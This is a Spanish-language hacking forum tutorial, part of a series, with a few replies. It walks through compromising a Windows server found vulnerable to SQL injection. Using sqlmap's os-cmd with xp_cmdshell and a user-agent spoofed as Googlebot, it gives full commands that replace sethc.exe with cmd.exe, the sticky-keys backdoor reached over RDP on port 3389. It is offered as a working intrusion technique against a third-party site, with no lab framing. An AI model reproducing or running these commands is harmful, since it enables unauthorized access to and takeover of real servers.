En la parte anterior vimos lo siguiente:
Exploit para MySQL vulnerable.
Como saber los usuarios que hay en la base de datos en la que estamos trabajando con Sqlmap.
Saber los privilegios de esos usuarios.
Conocer que usuario somos en la base de datos.
Averiguar si somos Administradores de la base de datos.
Continuemos.
Sabemos que somos un usuario con privilegios y que somos dba (data base admin).
(http://1.bp.blogspot.com/-KlC4lTcry1k/VoXY-wpC1oI/AAAAAAAAG58/rtWmmXNClPQ/s640/Selecci%25C3%25B3n_061.png)
y que podemos ejecutar comandos con xp_cmdshell
(http://2.bp.blogspot.com/-rOJT4MC2-wo/VoXY-68_uHI/AAAAAAAAG54/Y1_mnjzhP-o/s640/Selecci%25C3%25B3n_063.png)
omo podemos ver tiene abierto el puerto 3389 osea el puerto de administracion remota de windows
Ya sabemos que no podemos:
Subir una webshell.
Penetrar mediante Metasploit.
Entonces usemos nuestra imaginación de Hacker's, pensemos que podemos hacer para poder explotar ese puerto y obtener acceso al servidor, tiene que ser algo que no implique exploits que inyecten código ya que no funciona (En este caso).
(http://4.bp.blogspot.com/-pTnLm0Zn68w/VoXYSRk-6MI/AAAAAAAAG5c/pqoqLAc4K_s/s640/Selecci%25C3%25B3n_054.png)
No se les ocurre nada??
Pues les mostrare una manera fácil y sencilla dado nuestro caso.
Aprovecharemos Sqlmap para entrar..., ¿¿sqlmap?? ¿¿Pero ya hicimos eso no??.
Pues si y no.
Realizamos el SQLi, pero ahora lo que haremos sera utilizar xp_cmdshell. Vamos.
Primero les enseñare algo que ocurre en el servidor.
En el sistema Windows cuando pulsas repetidas veces la tecla Shift o Mayus aparece un mensaje.
http://2.bp.blogspot.com/-QdL0Cpvym6s/Vp1Ye_3ZsfI/AAAAAAAAG6M/LtfwVPPl6YI/s640/Selecci%25C3%25B3n_064.png
Presione Shift 5 veces seguidas
(http://1.bp.blogspot.com/--jdTcvllVLY/Vp1Yge3pXBI/AAAAAAAAG6U/tE0YLS6gCyw/s640/Selecci%25C3%25B3n_066.png%5B/img%3Cbr%20/%3E%3Cbr%20/%3EAparece%20este%20mensaje%3Cbr%20/%3E%3Cbr%20/%3EC://Windows/system32/%20%3Cbr%20/%3E%3Cbr%20/%3EY%20busco%20el%20archivo:%20%3Cbr%20/%3E%3Cbr%20/%3E%3Cbr%20/%3Esethc.exe%3Cbr%20/%3E%3Cbr%20/%3EY%20lo%20ejecuto%20aparecer%C3%A1%20esto:%3Cbr%20/%3E%3Cbr%20/%3E%5Bimg%5Dhttp://4.bp.blogspot.com/-G9VbvldCfCY/Vp1bF0-CxWI/AAAAAAAAG6g/AVAoinCMyTI/s640/Selecci%25C3%25B3n_067.png)
Ese es el archivo ejecutable que abre ese dialogo, entonces aprovecharemos eso para entrar al sevidor.
Vamos a la consola y con el comando
rdesktop IPdelServidor
Nos conectaremos a el mediante el puerto 3389.
(http://4.bp.blogspot.com/-U0w08cocGxI/Vp1cnCBW5UI/AAAAAAAAG6w/811K4ASbxcs/s640/Selecci%25C3%25B3n_068.png)
y 5 Shift's o Mayus despues...
(http://3.bp.blogspot.com/-hBUqCO1OiC0/Vp1coojIARI/AAAAAAAAG64/LzcuvHNYRGY/s640/Selecci%25C3%25B3n_069.png)
Muy bien funciona como debería. Ahora a explotarlo >:}
Volvemos a Sqlmap y ejecutemos lo siguiente con xp_cmdshell:
sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)" –level=5 –risk=3 –os-cmd='Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"'
Copiara el archivo sethc.exe que esta en "C:/windows/system32/" a esa misma carpeta pero a un archivo llamado sethc.zzz veamos.
(http://3.bp.blogspot.com/-WZSjfXV3_W0/Vp1hrmA5v5I/AAAAAAAAG7E/ekEZLqW2lEc/s640/Selecci%25C3%25B3n_070.png)
Muy bien ahora otro comando.
sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)" –level=5 –risk=3 –os-cmd='Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"'
De nuevo expliquemos.
–os-cmd='Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"'
Copiara de la carpeta "C://windows/system32/" el archivo cmd.exe a esa misma carpeta pero con el nombre sethc.exe ya entendieron
@m0rf30 (https://underc0de.org/foro/index.php?action=profile;u=60197) edite el titulo de tus posts, porque no guardan una relacion directa como si fuesen un manual en pasos o paper.
Saludos!, EPSILON
Y si resulta que no eres usuario dba solo un usuario "normal", como seria para poder escalar a un usuario con priv y poder acceder a las dbs restringidas??
Muy buen tuto, aunque lo apropiado es que no se llamara "Escalacion de Privilegios", ya que el usuario en un principio es DBA y por ende ya tienes bastante ventaja
Saludos!